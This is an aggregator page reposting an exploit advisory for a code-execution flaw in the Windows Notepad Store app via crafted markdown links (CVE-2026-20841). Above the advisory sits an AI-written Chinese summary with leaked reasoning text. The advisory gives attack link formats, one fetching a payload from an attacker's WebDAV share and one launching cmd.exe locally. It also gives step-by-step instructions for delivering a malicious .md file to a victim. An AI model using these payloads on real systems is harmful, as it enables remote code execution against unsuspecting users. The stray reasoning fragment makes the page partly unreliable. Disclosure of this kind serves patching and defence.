Windows Notepad App (Store Version) - Remote/Local Code Execution via Markdown Link
好的,我现在需要帮用户总结一篇文章的内容,控制在100字以内。用户提供的文章是一个漏洞报告,涉及Windows Notepad应用的Store版本。漏洞允许远程或本地代码执行,通过Markdown链接。 首先,我需要理解文章的主要内容。漏洞标题是Windows Notepad App(Store版本)的远程/本地代码执行漏洞,CVE编号是CVE-2026-20841。影响版本是11.0.0到11.2510.14.0,已经修复于11.2510.14.0+版本。漏洞利用方式是通过Markdown链接中的协议处理程序,导致ShellExecuteExW()执行任意二进制文件。 攻击场景分为两种:远程和本地。远程攻击通过WebDAV/SMB共享托管payload,本地则直接执行系统二进制文件。修复措施增加了警告对话框,但没有阻止执行。 接下来,我需要将这些信息浓缩到大约100字以内。重点包括漏洞名称、影响版本、利用方式、攻击场景以及修复情况。 可能的结构是:Windows Notepad Store版存在漏洞(CVE-2026-20841),影响特定版本,通过Markdown链接导致代码执行,分远程和本地攻击场景,已修复但仅警告未阻止。 现在检查字数是否符合要求,并确保信息准确无误。 </think> Windows Notepad Store版存在远程/本地代码执行漏洞(CVE-2026-20841),影响版本为11.0.0至11.2510.14.0。该漏洞源于未正确验证Markdown链接中的协议处理程序,导致ShellExecuteExW()执行任意二进制文件。攻击者可通过网络或本地场景触发payload,微软已修复但仅增加警告未阻止执行。 2026-3-2 21:13:6 Author: cxsecurity.com(查看原文) 阅读量:1 收藏

# Exploit Title: Windows Notepad App (Store Version) - Remote/Local Code Execution via Markdown Link # Date: 2026-02-26 # Exploit Author: nu11secur1ty # Vendor Homepage: https://www.microsoft.com # Software Link: https://apps.microsoft.com/detail/9msmlrh6lzf3 # Version: Windows Notepad App versions 11.0.0 through 11.2510.14.0 # Tested on: Windows 11 (Notepad 11.2510.14.0) # CVE: CVE-2026-20841 # CVSS: 8.8 (AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H) Description: The Windows Notepad App (Microsoft Store version) fails to properly validate protocol handlers in markdown links. When a user Ctrl+Click on a crafted link in a .md file, Notepad passes the raw URI to ShellExecuteExW() without sufficient filtering . This allows execution of arbitrary binaries in TWO distinct attack scenarios: 1. REMOTE CODE EXECUTION (RCE) - Network Scenario: - Attacker hosts payload on WebDAV/SMB share - Link format: `file:///\\attacker@port\DavWWWRoot\payload.py` - Windows fetches and executes remote payload when clicked - Confirmed by Microsoft: "load and execute remote files" 2. LOCAL CODE EXECUTION - Offline Scenario: - Attacker with local access executes system binaries - Link format: `file://C:/Windows/System32/cmd.exe` - No network required - payloads already on disk Affected versions: 11.0.0 through 11.2510.14.0 Fixed in: 11.2510.14.0+ (requires manual Store update) Note: The patch adds a warning dialog but does NOT block execution Usage: 1. Modify the attacker IP in remote payloads to your machine 2. Run the script to generate malicious .md file 3. Host payloads on WebDAV/SMB server (for remote attack) 4. Deliver .md file to target 5. Victim opens in vulnerable Notepad and Ctrl+Click any link # Exploit: [href](https://github.com/nu11secur1ty/Windows11Exploits/blob/main/2026/CVE-2026-20841/exploit.md)



 

Thanks for you comment!
Your message is in quarantine 48 hours.


文章来源: https://cxsecurity.com/issue/WLB-2026030006
如有侵权请联系:admin#unsafe.sh